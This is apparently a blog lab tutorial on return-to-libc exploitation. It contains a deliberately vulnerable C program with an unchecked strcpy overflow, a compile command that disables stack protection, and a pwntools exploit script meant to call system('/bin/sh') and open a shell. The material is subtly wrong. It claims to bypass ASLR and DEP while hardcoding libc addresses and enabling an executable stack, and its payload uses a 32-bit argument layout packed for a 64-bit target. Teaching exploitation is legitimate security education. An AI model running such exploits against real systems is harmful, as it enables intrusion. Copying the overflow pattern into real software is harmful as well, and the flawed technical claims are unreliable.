strangerRidingCaml

Return-to-Libc (RTL) Exploits Lab 본문

System hacking

Return-to-Libc (RTL) Exploits Lab

woddlwoddl 2024. 5. 7. 17:24
728x90
Return-to-Libc (RTL) Exploits Lab

Return-to-Libc (RTL) Exploits Lab

In this lab, we will learn how to craft RTL exploits to bypass ASLR and DEP protections.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to craft the RTL exploit.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of system() function in libc
  system_address = 0x7ffff7a33440  # Example address (change as per libc version)

  # Address of "/bin/sh" string in libc
  bin_sh_address = 0x7ffff7b989d7  # Example address (change as per libc version)

  # Offset to return address
  offset = 72

  # Craft the payload
  payload = b'A' * offset
  payload += p64(system_address)
  payload += p64(0xdeadbeef)  # Fake return address
  payload += p64(bin_sh_address)

  # Launch the exploit
  p = process(binary_path)
  p.sendline(payload)
  p.interactive()

Explanation of the Python script:

  • We specify the addresses of the system() function and /bin/sh string in libc.
  • The payload consists of padding, followed by the address of system(), a fake return address, and the address of /bin/sh.
  • We launch the vulnerable binary and send the payload to trigger the RTL exploit.
  • p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful exploitation of the RTL vulnerability.

'System hacking' 카테고리의 다른 글

Return-Oriented Programming (ROP) Lab  (0) 2024.05.07
Frame Pointer Overwrite Attacks Lab  (0) 2024.05.07
Frame Faking and Fake EBP Lab  (0) 2024.05.07
Return-to-Shellcode Attacks Lab  (0) 2024.05.07
Shellcode Development Lab  (0) 2024.05.07
'System hacking' Related Articles more